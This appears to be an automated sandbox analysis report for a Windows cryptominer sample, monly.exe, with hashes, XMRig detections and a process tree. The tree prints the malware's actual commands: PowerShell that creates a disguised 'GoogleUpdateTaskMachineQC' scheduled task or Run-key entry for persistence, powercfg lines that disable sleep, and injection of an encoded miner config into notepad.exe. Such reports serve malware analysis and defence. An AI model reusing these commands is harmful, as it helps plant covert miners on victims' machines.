Analysis
-
max time kernel
300s -
max time network
296s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
12/01/2023, 05:36
Static task
static1
Behavioral task
behavioral1
Sample
monly.exe
Resource
win7-20220812-en
General
-
Target
monly.exe
-
Size
2.0MB
-
MD5
50591643463aa061f6a1093c224685ad
-
SHA1
8647dad50e4fe4cc5a5908cfad55a214536b59fa
-
SHA256
7981b6a4a0f64eae7f318771206be555f703e58e094170fdc1e0f561fb961f69
-
SHA512
164f909f16065e46dabee2f1d59db5036903778aedf2ed78841dcec38b3fdbafd39fc5b3c7f9089aba0815baf20b8a89abf374a05162ab47fb572ed0b4908f9b
-
SSDEEP
49152:nDLC8ycrPTN6kydQIaWCZgZK/3nXbemOIYVzZG6qpdy709Ym+o:n68ycvN/6dU3XMVzZHqpsAYm+o
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 4944 created 3048 4944 monly.exe 45 PID 4944 created 3048 4944 monly.exe 45 PID 4944 created 3048 4944 monly.exe 45 PID 1460 created 3048 1460 updater.exe 45 PID 1460 created 3048 1460 updater.exe 45 PID 1460 created 3048 1460 updater.exe 45 PID 824 created 3048 824 conhost.exe 45 PID 1460 created 3048 1460 updater.exe 45 PID 1460 created 3048 1460 updater.exe 45 -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/memory/900-158-0x00007FF658200000-0x00007FF6589F4000-memory.dmp xmrig behavioral2/memory/900-160-0x00007FF658200000-0x00007FF6589F4000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 1460 updater.exe -
resource yara_rule behavioral2/memory/900-158-0x00007FF658200000-0x00007FF6589F4000-memory.dmp upx behavioral2/memory/900-160-0x00007FF658200000-0x00007FF6589F4000-memory.dmp upx -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1460 set thread context of 824 1460 updater.exe 107 PID 1460 set thread context of 900 1460 updater.exe 113 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4944 monly.exe 4944 monly.exe 4944 monly.exe 4944 monly.exe 1868 powershell.exe 1868 powershell.exe 4944 monly.exe 4944 monly.exe 3312 powershell.exe 3312 powershell.exe 1460 updater.exe 1460 updater.exe 1460 updater.exe 1460 updater.exe 2872 powershell.exe 2872 powershell.exe 1460 updater.exe 1460 updater.exe 824 conhost.exe 824 conhost.exe 1460 updater.exe 1460 updater.exe 1460 updater.exe 1460 updater.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe 900 notepad.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 644 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 204 powercfg.exe Token: SeCreatePagefilePrivilege 204 powercfg.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeShutdownPrivilege 4080 powercfg.exe Token: SeCreatePagefilePrivilege 4080 powercfg.exe Token: SeShutdownPrivilege 1644 powercfg.exe Token: SeCreatePagefilePrivilege 1644 powercfg.exe Token: SeShutdownPrivilege 820 powercfg.exe Token: SeCreatePagefilePrivilege 820 powercfg.exe Token: SeIncreaseQuotaPrivilege 1868 powershell.exe Token: SeSecurityPrivilege 1868 powershell.exe Token: SeTakeOwnershipPrivilege 1868 powershell.exe Token: SeLoadDriverPrivilege 1868 powershell.exe Token: SeSystemProfilePrivilege 1868 powershell.exe Token: SeSystemtimePrivilege 1868 powershell.exe Token: SeProfSingleProcessPrivilege 1868 powershell.exe Token: SeIncBasePriorityPrivilege 1868 powershell.exe Token: SeCreatePagefilePrivilege 1868 powershell.exe Token: SeBackupPrivilege 1868 powershell.exe Token: SeRestorePrivilege 1868 powershell.exe Token: SeShutdownPrivilege 1868 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeSystemEnvironmentPrivilege 1868 powershell.exe Token: SeRemoteShutdownPrivilege 1868 powershell.exe Token: SeUndockPrivilege 1868 powershell.exe Token: SeManageVolumePrivilege 1868 powershell.exe Token: 33 1868 powershell.exe Token: 34 1868 powershell.exe Token: 35 1868 powershell.exe Token: 36 1868 powershell.exe Token: SeIncreaseQuotaPrivilege 1868 powershell.exe Token: SeSecurityPrivilege 1868 powershell.exe Token: SeTakeOwnershipPrivilege 1868 powershell.exe Token: SeLoadDriverPrivilege 1868 powershell.exe Token: SeSystemProfilePrivilege 1868 powershell.exe Token: SeSystemtimePrivilege 1868 powershell.exe Token: SeProfSingleProcessPrivilege 1868 powershell.exe Token: SeIncBasePriorityPrivilege 1868 powershell.exe Token: SeCreatePagefilePrivilege 1868 powershell.exe Token: SeBackupPrivilege 1868 powershell.exe Token: SeRestorePrivilege 1868 powershell.exe Token: SeShutdownPrivilege 1868 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeSystemEnvironmentPrivilege 1868 powershell.exe Token: SeRemoteShutdownPrivilege 1868 powershell.exe Token: SeUndockPrivilege 1868 powershell.exe Token: SeManageVolumePrivilege 1868 powershell.exe Token: 33 1868 powershell.exe Token: 34 1868 powershell.exe Token: 35 1868 powershell.exe Token: 36 1868 powershell.exe Token: SeIncreaseQuotaPrivilege 1868 powershell.exe Token: SeSecurityPrivilege 1868 powershell.exe Token: SeTakeOwnershipPrivilege 1868 powershell.exe Token: SeLoadDriverPrivilege 1868 powershell.exe Token: SeSystemProfilePrivilege 1868 powershell.exe Token: SeSystemtimePrivilege 1868 powershell.exe Token: SeProfSingleProcessPrivilege 1868 powershell.exe Token: SeIncBasePriorityPrivilege 1868 powershell.exe Token: SeCreatePagefilePrivilege 1868 powershell.exe Token: SeBackupPrivilege 1868 powershell.exe Token: SeRestorePrivilege 1868 powershell.exe Token: SeShutdownPrivilege 1868 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3372 wrote to memory of 204 3372 cmd.exe 90 PID 3372 wrote to memory of 204 3372 cmd.exe 90 PID 3372 wrote to memory of 4080 3372 cmd.exe 91 PID 3372 wrote to memory of 4080 3372 cmd.exe 91 PID 3372 wrote to memory of 1644 3372 cmd.exe 92 PID 3372 wrote to memory of 1644 3372 cmd.exe 92 PID 3372 wrote to memory of 820 3372 cmd.exe 93 PID 3372 wrote to memory of 820 3372 cmd.exe 93 PID 3312 wrote to memory of 2884 3312 powershell.exe 96 PID 3312 wrote to memory of 2884 3312 powershell.exe 96 PID 3104 wrote to memory of 4048 3104 cmd.exe 103 PID 3104 wrote to memory of 4048 3104 cmd.exe 103 PID 3104 wrote to memory of 4564 3104 cmd.exe 104 PID 3104 wrote to memory of 4564 3104 cmd.exe 104 PID 3104 wrote to memory of 3580 3104 cmd.exe 105 PID 3104 wrote to memory of 3580 3104 cmd.exe 105 PID 3104 wrote to memory of 1552 3104 cmd.exe 106 PID 3104 wrote to memory of 1552 3104 cmd.exe 106 PID 1460 wrote to memory of 824 1460 updater.exe 107 PID 4432 wrote to memory of 4232 4432 cmd.exe 111 PID 4432 wrote to memory of 4232 4432 cmd.exe 111 PID 1460 wrote to memory of 900 1460 updater.exe 113
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3048
-
C:\Users\Admin\AppData\Local\Temp\monly.exe"C:\Users\Admin\AppData\Local\Temp\monly.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4944
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:204
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vpzjefdr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#imewl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2884
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4048
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4564
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3580
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1552
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vpzjefdr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2872
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe vrcccnqi2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:824
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"2⤵PID:3588
-
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe amlutehkvrexxnan 6E3sjfZq2rJQaxvLPmXgsF8m0bydKza2y5kqAUGcbpao/0Ot8N4z1S2zUsf2CmEzagE3EoWzRxynpgqx+IdZeyRsQLKxHp2bKyQXrUSafgp6v8OMiAaCPQVvAhiX00lmhopIy68BKcw3eTBQdbhXcWRQJl6kXYk0RzxSzbvaop4IZYxrzOKPiujusKtpZDaGwuSSrLUl37OhLbWqW8JxkjGYR7xNSCeomuHAHI0WC/87tApA7wraT03QKHAigScCH223uz2H1ZJm98DbzRrFHvV+snKfqtZBxeQcnBAddAZ1QHrWW6900PC8Vie7AqPFEAWND1ScyDlrqjgfIplSfAjIEJyAvbgcblscWs8ggtg9bGDUX0iYbjuOw/9SZeK8/gzphmUHQFaDoZJZwgc3RxP5XmucG9fn3OsiU/MupoyqErVH6OGFYpBPSGlhCxFwXkytz08QlUWIbZnHUgCPJ6CUTsQT3e8DR8tqCIKQzvzShnXxx+WXrq+HjxoKcQGtVIC8XrTj8W/y8rxGD9cpS1msl+wFICDkwtObijOKQnRu+eLSXx0IQgdJYV635eIFw2mEQVgkbBxc7gQ0bNbNQEM4YjrunN2Afh3Dd1gPaNLzv2i2ccNquC85tdrGUEcAiqRsKHcuI9cxqIeRBtWqGYNpftfNJoXa13tHQYzoXNna/mZQT0tbK3qOHKSKg6jN4nWMcvamRU5Wd3UXsXTdWghezKbvQw0FC3Mks88wZZI=2⤵
- Suspicious behavior: EnumeratesProcesses
PID:900
-
-
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1460
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
Filesize
1KB
MD5d2b54d43c47c01c84648072eff87488d
SHA1e3569422679f4196c0ea8b4066402471cc0bc6c8
SHA2569c6fd9ad1101973dbe2776d9135c7760f86a4a71790fa1845c108ebc8f3b1c85
SHA512e8e29c236de39297e06f4dc78b7ba7dd841d7603155d8ad6a611c72d1dca354eb6ea2ae1ca5d82eeea01cf21da54b921c7c21c12845265e2256a43f2e3416179
-
Filesize
1KB
MD5055cd1930e45c3d77aa744d53bcc29d9
SHA1af1464daf329f36930b71fb33119c61a13472b6d
SHA256fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c
SHA51200ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d
-
Filesize
2.0MB
MD550591643463aa061f6a1093c224685ad
SHA18647dad50e4fe4cc5a5908cfad55a214536b59fa
SHA2567981b6a4a0f64eae7f318771206be555f703e58e094170fdc1e0f561fb961f69
SHA512164f909f16065e46dabee2f1d59db5036903778aedf2ed78841dcec38b3fdbafd39fc5b3c7f9089aba0815baf20b8a89abf374a05162ab47fb572ed0b4908f9b
-
Filesize
2.0MB
MD550591643463aa061f6a1093c224685ad
SHA18647dad50e4fe4cc5a5908cfad55a214536b59fa
SHA2567981b6a4a0f64eae7f318771206be555f703e58e094170fdc1e0f561fb961f69
SHA512164f909f16065e46dabee2f1d59db5036903778aedf2ed78841dcec38b3fdbafd39fc5b3c7f9089aba0815baf20b8a89abf374a05162ab47fb572ed0b4908f9b
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29